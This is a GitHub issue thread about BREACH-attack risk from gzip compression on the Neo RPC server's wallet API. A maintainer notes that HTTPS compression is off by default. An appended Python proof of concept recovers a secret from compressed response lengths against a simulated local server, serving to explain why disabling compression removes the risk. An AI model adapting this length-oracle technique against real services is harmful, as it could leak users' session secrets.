Closed cschuchardt88 closed 1 year ago
// Summary:
// Indicates if responses over HTTPS connections should be compressed. The default
// is 'false'. Enabling compression on HTTPS requests for remotely manipulable content
// may expose security problems.
//
// Remarks:
// This can be overridden per request using Microsoft.AspNetCore.Http.Features.IHttpsCompressionFeature.
Seems disabled by default
@shargon thanks for clearing that up. Can we have the option to enable or disable it? Or change the compression level?
Closing ... problem resolved.
Summary or problem description
Having compression is a nice feature to have, but there is one drawback: the security vulnerability of a BREACH attack.
With a server with the wallet API enabled this could be deadly. An attacker could inject malicious text into a request to send NEO, GAS -- worst case scenario.
Read More about it here https://www.breachattack.com/
Do you have any solution you want to propose?
Remove the GZip command from the server, or have an option to configure it on or off. Let the user choose to enable or disable it.
Where in the software does this update apply?
https://github.com/neo-project/neo-modules/blob/99ffc846e4df93491d1d812cb4c6ef6ee875e056/src/RpcServer/RpcServer.cs#L132
https://github.com/neo-project/neo-modules/blob/99ffc846e4df93491d1d812cb4c6ef6ee875e056/src/RpcServer/RpcServer.cs#L140
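As an added illustration of the BREACH risk the issue describes (example code written for this page; it is not part of neo-modules or the RPC server), the script below models a server that reflects attacker input into a compressed body that also carries a secret, and an attacker who recovers that secret one character at a time from nothing but the compressed length. Everything in it is constructed: the JSON layout with an `echo` field and a `session` field, the secret value and its hex alphabet are hypothetical, and the server is modelled as raw DEFLATE with zlib's `Z_FIXED` strategy (static Huffman codes) so that every literal has a fixed bit cost and the oracle is deterministic. A real server uses dynamic Huffman coding, which adds noise that the attack averages out over more requests; the mechanism is the same.

```python
"""BREACH-style length oracle against a reflected, compressed response.

Constructed example for this page. It is not code from neo-modules; the
JSON layout, field names, secret and alphabet are all hypothetical.
"""
import zlib

SECRET = "7f3a9c1e5b8d2046"      # hypothetical secret carried in the body
ALPHABET = "0123456789abcdef"     # the attacker knows the secret's alphabet
ANCHOR = '"session":"'           # text that immediately precedes the secret


def render_body(echo: bytes) -> bytes:
    """Hypothetical response body: attacker input reflected byte-for-byte,
    followed by a field holding the secret."""
    return (b'{"result":{"echo":"' + echo + b'",'
            + ANCHOR.encode() + SECRET.encode() + b'"}}')


def server_response(echo: bytes, compress: bool = True) -> bytes:
    """Server side. With compress=True the body is raw DEFLATE using static
    Huffman codes (Z_FIXED): literals 0-143 cost 8 bits, 144-255 cost 9 bits,
    so the only thing that changes with the attacker's guess is LZ77 matching.
    compress=False models the on/off switch the issue asks for."""
    body = render_body(echo)
    if not compress:
        return body
    co = zlib.compressobj(9, zlib.DEFLATED, -15, 9, zlib.Z_FIXED)
    return co.compress(body) + co.flush()


def oracle(echo: bytes, compress: bool = True) -> int:
    """The attacker's only observable: the length of the response on the wire."""
    return len(server_response(echo, compress))


def score(guess: str, compress: bool = True) -> int:
    """Bit-exact cost of a guess, measured through a byte-granular oracle.

    DEFLATE output is rounded up to whole bytes, so the 7-8 bit saving from one
    extra matched byte can be hidden by alignment. Prepending p bytes from
    0x90..0x97 (each an unmatched 9-bit static literal) shifts the alignment
    by p bits, so summing the byte lengths over p = 0..7 changes by one for
    every bit saved. The guess is reflected as ANCHOR + known prefix + one
    candidate character, so a correct candidate lets the LZ77 match at the
    real secret extend one byte further into it."""
    return sum(oracle(bytes(range(0x90, 0x90 + p)) + (ANCHOR + guess).encode(),
                      compress)
               for p in range(8))


def recover_secret(length: int, compress: bool = True) -> str:
    """Extend the known prefix one character at a time, keeping whichever
    candidate makes the response compress best."""
    known = ""
    for _ in range(length):
        known += min(ALPHABET, key=lambda c: score(known + c, compress))
    return known


if __name__ == "__main__":
    print("compressed  :", recover_secret(len(SECRET)))
    print("uncompressed:", recover_secret(len(SECRET), compress=False))
```

With compression on, `recover_secret` returns the secret after 16 rounds of 16 candidates (8 alignment probes each, all local). With `compress=False` every candidate scores identically and the search degenerates to the first character of the alphabet at every position, which is exactly why the thread's outcome, not compressing responses that mix secrets with attacker-controlled data (`EnableForHttps` left at `false`, or an explicit switch), removes the problem rather than mitigating it.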